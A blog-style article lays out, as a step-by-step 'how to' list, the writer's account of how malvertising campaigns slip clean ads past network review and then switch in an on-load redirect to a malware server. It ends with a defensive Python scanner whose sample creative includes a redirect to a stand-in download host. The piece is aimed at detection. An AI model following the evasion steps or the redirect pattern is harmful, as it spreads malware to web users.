Conceptual Anatomy of a Malware Publisher
NOTICE and DISCLAIMER: This is speculation, opinion, and my own conceptualization of how malware is distributed via advertisement networks.
Article for Discussion:
How to add malware to your advertisement running on public advertisement networks.
- Follow all guidelines as published by the ad network you are planning on running your advertisement on.
- Create a clean, professional looking advertisement without identifiable information or an actual product.
- Make your advertisement about something you believe would not be clicked on. (56Kbps modem connections, $0.75 per minute long distance.)
- Let your advertisement run for at least 30 days.
- Add 2 more ads to the network you are using repeating steps 1 - 3.
- Add a click tracker to the ads that is iframed and/or Java-based.
- Add a simple dot.gif image plus HTML as a stats tracker, and link it as an iframe to a second web server over which you have direct control and access.
- Allow the ads to pass quality control and inspection.
- Allow the ads to run for a few days.
- On the 5th day, increase your bid to expose your advertisement to more popular websites.
- On that 5th day (35 days total) of running your ads, plan on a late Friday afternoon to make the switch.
- Start by adding an on-load redirect to the dot.gif image's HTML tracking code.
- Allow your advertisement to run until the account balance has been exhausted (zero balance).
- Abandon the ad account and the hosted server used to distribute the malware.
- Start setting up your next advertisement malware campaign.
From my experience tracking the code used and the HTML patterns, I do believe it's accurate to say the steps are correct. I may have missed the part where they get coffee and how often they set up, but the concept is solid in my opinion.
The malware campaign that gave me very good information started from a website showing US plane flights in real time. I'm not sure if that's still online today, and I'm not sure if the site was set up just for malware distribution, but the server was located in the USA. The malware distribution server was located in Colombia. The ads stopped, and it took about 30 days before I found a forum in the UK talking about this advertisement malware. I visited the forums and saw the 56Kbps modem advertisement, which was the same as on the other sites. Same virus download, but the distribution server had changed to a server located in France. The same code, same exploit (Media Player), same virus, but a different malware server campaign. I believe the campaigns are set up to run back to back.
It took me time to discover the next setup, and I only discovered it by searching for the virus used. People had started a forum post describing just what I was hunting for: the advertisement malware and the Inor virus.
I was able to identify the same banner GIF image, the code that infected my workstation, and how the iframe setup was coded in HTML. All the same copy-and-paste malware-kit scripts.
I have read a few publications about this topic since 2005 and find that many repeat the same discoveries with little advancement toward preventing this type of widespread virus infection. I believe it comes down to the code level: what advertisers are allowed and disallowed to do.
With this idea or concept I plan on running a simple sample of malformed advertisements that I have discovered during normal online surfing.
It may play out to be something very interesting in the long run. I am looking to identify patterns that network administrators can look for.
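As an added illustration of the kind of pattern an administrator could look for (this is my own example, not code from any campaign described above), the scanner below checks one piece of ad HTML for the indicators the anatomy lists: an iframe or script pulled from a host outside the ad network, a 1x1 dot.gif tracking pixel, and a redirect that fires on load. The trusted host names and the two sample creatives are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the hosts the ad network itself serves creatives and click trackers from.
TRUSTED_HOSTS = {"ads.example-network.test", "click.example-network.test"}

# Script idioms that send the page elsewhere on load (the "switch" step above).
REDIRECT_RE = re.compile(
    r"(?:\b(?:window|document|top|parent|self)\.)?\blocation(?:\.href)?\s*=(?!=)"
    r"|\blocation\.replace\s*\(", re.I)


class CreativeScanner(HTMLParser):
    """Collects the page's malvertising indicators from one HTML document."""

    def __init__(self):
        super().__init__()
        self.findings, self.in_script = [], False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = urlparse(src).hostname or ""
        if tag in ("iframe", "script") and host and host not in TRUSTED_HOSTS:
            self.findings.append(f"{tag} loads from untrusted host {host}")
        if tag == "img" and src.lower().endswith(".gif") and (
                a.get("width") in ("0", "1") or a.get("height") in ("0", "1")):
            self.findings.append(f"1x1 gif tracking pixel {src}")
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append("meta refresh redirect")
        for ev in ("onload", "onerror"):
            if REDIRECT_RE.search(a.get(ev, "")):
                self.findings.append(f"{ev} handler redirects")
        self.in_script = self.in_script or tag == "script"

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as raw text; flag a location change.
        if self.in_script and REDIRECT_RE.search(data):
            self.findings.append("inline script redirects on load")


def scan_creative(html):
    """Return the list of indicator descriptions found in the given HTML."""
    s = CreativeScanner()
    s.feed(html)
    s.close()
    return s.findings


# Constructed samples: a plain banner, and a tracker page after the "switch".
CLEAN_CREATIVE = ('<a href="https://click.example-network.test/c?id=1">'
                  '<img src="https://ads.example-network.test/modem56k.gif" width="468" height="60"></a>')
SWITCHED_TRACKER = ('<img src="https://second-server.invalid/dot.gif" width="1" height="1">'
                    '<iframe src="https://second-server.invalid/stats.html" width="1" height="1"></iframe>'
                    '<script>window.location = "https://second-server.invalid/dl";</script>')
```

Running `scan_creative` over the creative and over every document it iframes covers both the clean ad and the later tracker switch.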
Side Note: This could be a good research project for a startup group or student. Maybe just good discussion over morning coffee.